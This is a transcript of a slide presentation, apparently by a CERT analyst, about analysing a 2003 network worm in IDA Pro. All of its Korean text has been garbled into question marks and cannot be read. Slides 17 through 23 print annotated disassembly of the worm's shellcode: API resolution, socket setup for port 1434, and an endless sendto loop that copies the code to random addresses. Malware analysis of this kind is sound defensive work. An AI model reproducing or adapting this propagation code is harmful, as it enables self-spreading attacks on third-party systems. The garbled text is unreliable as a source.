Ida? ??? ?? ???? ?? - PowerPoint PPT Presentation

1 / 23
About This Presentation
Title:

Ida? ??? ?? ???? ??

Description:

Title: Ida Author: Last modified by: Created Date: 10/10/2003 3:08:24 AM Document presentation format – PowerPoint PPT presentation

Number of Views:153
Avg rating:3.0/5.0
Slides: 24
Provided by: 6649897
Learn more at: https://monkey.org
Category:
Tags: ida

less

Transcript and Presenter's Notes

Title: Ida? ??? ?? ???? ??


1
Ida? ??? ?? ???? ??
  • ???
  • ?????? CERT
  • mat_at_monkey.org

2
Ida Pro
  • ??????? ??? CPU Instruction? ????.
  • ??? ??? ????.     
  • ???? ?? ?? ? ? ??.

3
?? ?? ??? ?? Ida
  • ??? CPU Instruction???? ?? ?? ???? ???? ?? ?? ??? 
    ?? ? ? ??.
  • ?? ??? ??
  • ?? ??? ??? ????? ???? ??? ???? ??? ??.
  • Ida? ? ????? ?? ??? ??? ?? ???? ??? ????.

4
?? ??
  • ????
  • 2003.1.25? ?? ????? ?? ?? ???.
  • ????????? ???.

5
??? ??
  • ???? IDS? ??? ????? ??? ????.

6
??? ??
  • ?? ???? ????? ethereal? ???? ??? ?? ??.
  • ??? ????? ??? ?? ??? ??.

7
??? ??
  • ??? ?? ??? ??? ??? ? ??.

8
?? ??
  • ida? ???? ?? ???? ??? ???.

9
?? ??
  • 32??? ????? ??.

10
?? ???
  • ????? ???? ?? ????? ????.

11
??
  • ??? ??? ???.

12
?? ?? ??
  • ??? ?? 0x90? ???? ??? ?????.

13
??? ??
  • C ?? ??? ? ?? ??? ??? ????.

14
??? ??
  • ??? ?? ??? ???? ??? ??.

15
??? ??
  • ??? ??? ?? ??? ???? ?? ??.

16
??
  • ??? ??? ?? ????.

17
Shellcode Part Start
nop nop nop nop nop nop nop nop push
42B0C9DCh mov eax, 1010101h xor ecx,
ecx mov cl, 18h
18
Stack ??
  •     loc_DD                     CODE XREF
    seg000000000DEj            push    eax         
       loop    loc_DD            xor    eax,
    5010101h            push    eax            mov  
      ebp, esp            push    ecx            pus
    h    6C6C642Eh     .dll            push    32336
    C65h     el32            push    6E72656Bh    
    kern            push    ecx            push    7
    46E756Fh     ount            push    436B6369h  
       ickC            push    54746547h    
    GetT            mov    cx, 6C6Ch    
    ll            push    ecx            push    642
    E3233h     32.d            push    5F327377h    
    ws2_            mov    cx, 7465h    
    et            push    ecx            push    6B6
    36F73h     sock            mov    cx,
    6F74h     to            push    ecx            
    push    646E6573h     send                      
                                Stack    is
    now                                            
          ebp                         -10
    kernel32.dll                         -20
    GetTickCount____                         -2C
    ws2_32.dll__                         -34
    socket__                         -3C sendto__

19
LoadLibrary GetProcAddress
  •             mov    esi, 42AE1018h    
    LoadLibrary address?            lea    eax,
    ebp-2Ch     "ws2_32.dll"            push    ea
    x            call    dword ptr esi     call
    LoadLibrary("ws2_32.dll")            push    eax 
            ws2_32.dll handle            lea    eax,
    ebp-20h     "GetTickCount"            push   
     eax            lea    eax, ebp-10h    
    "kernel32.dll"            push    eax           
     call    dword ptr esi     call
    LoadLibrary("kernel32.dll")            push    ea
    x         kernel32.dll handle            mov    
    esi, 42AE1010h     GetProcAddress?            mo
    v    ebx, esi            mov    eax,
    ebx            cmp    eax, 51EC8B55h    
    Check    if this    GetProcAddress value
    is    valid            jz    short loc_157    
    GetProcAddress(kernel32.dll handle,"GetTickCount")
                mov    esi, 42AE101Ch    
    GetProcAddress

20
Call Socket
  •  loc_157                 CODE XREF
    seg00000000150j            call    dword ptr
    esi     GetProcAddress(kernel32.dll
    handle,"GetTickCount")            call    eax    
         call GetTickCount            xor    ecx,
    ecx     ecx0            push    ecx        
    pad            push    ecx        
    pad            push    eax         return value
    of GetTickCount                         -gt
    ebp-4c sin_addr                        
                xor    ecx, 9B040103h     filling
    struct sockaddr_in                        
    sin_family                        
    sin_port            xor    ecx, 1010101h    
    ebp-50 9a050002                        
                             sin_port9a05    -gt
    59a1434                        
    sin_family2            push    ecx            l
    ea    eax, ebp-34h     "socket"
    address            push    eax            mov   
     eax, ebp-40h     ws_32.dll handle            
    push    eax            call    dword ptr
    esi     GetProcAddress(ws2_32.dll
    handle,"socket")            push    11h         
       push    2            push    2            cal
    l    eax         call socket(2,2,17)    

21
Send
  •             push    eax            lea    eax,
    ebp-3Ch     "sendto" address            push  
      eax            mov    eax, ebp-40h    
    ws2_32.dll handle            push    eax        
        call    dword ptr esi    
    GetProcAddress(ws2_32.dll handle,"sendto")       
         mov    esi, eax     esisendto
    address            or    ebx, ebx            xor
        ebx, 0FFD9613Ch    

22
Stack Map
  •      Stack    is now          ebp     -10
    kernel32.dll     -20 GetTickCount____    
    -2C ws2_32.dll__     -34 socket__     -3C
    sendto__     -40 ws2_32.dll handle    
         struct sockaddr_in    
    -----------------------------------------    
    -44 0     -48 0     -4c GetTickCount
    result sin_addr     -4e 9a05 sin_port    
    -50 0002 sin_family     ----------------------
    -------------          sin_port9a05    -gt
    59a1434     sin_family2    
    -----------------------------------------    
         / Structure describing an Internet (IP)
    socket address. /              define
    __SOCK_SIZE__     16         / sizeof(struct
    sockaddr)     /     struct sockaddr_in     
    sa_family_t         sin_family     / Address
    family         /      unsigned short int    
    sin_port     / Port number         /     
    struct in_addr     sin_addr     / Internet
    address         /           / Pad to size
    of struct sockaddr'. /     unsigned char    
    __pad__SOCK_SIZE__ -    sizeof(short int)
    -                 sizeof(unsigned short    int)
    - sizeof(struct in_addr)         

23
Packet Sendto loop
  • packet_sendto_loop             CODE XREF
    seg000000001C8j            mov    eax,
    ebp-4Ch     struct sockaddr_in
    -gt    sin_addr            lea    ecx,
    eaxeax2 get random address            lea  
      edx, eaxecx4            shl    edx,
    4            add    edx, eax            shl    e
    dx, 8            sub    edx, eax            lea 
       eax, eaxedx4            add    eax,
    ebx            mov    ebp-4Ch, eax    
    sin_addr setting            push    10h        
    socklen_t tolen0x10            lea    eax,
    ebp-50h            push    eax         struct
    sockaddr_in to            xor    ecx,
    ecx            push    ecx        
    flags0            xor    cx, 178h            pu
    sh    ecx         len178h            lea    eax
    , ebp3            push    eax        
    datastart of    this code            mov    eax,
    ebp-54h            push    eax        
    socket handle            call    esi        
    call sendto            jmp    short
    packet_sendto_loop struct sockaddr_in -gt
    sin_addr    seg000        ends                e
    nd     
Write a Comment
User Comments (0)
About PowerShow.com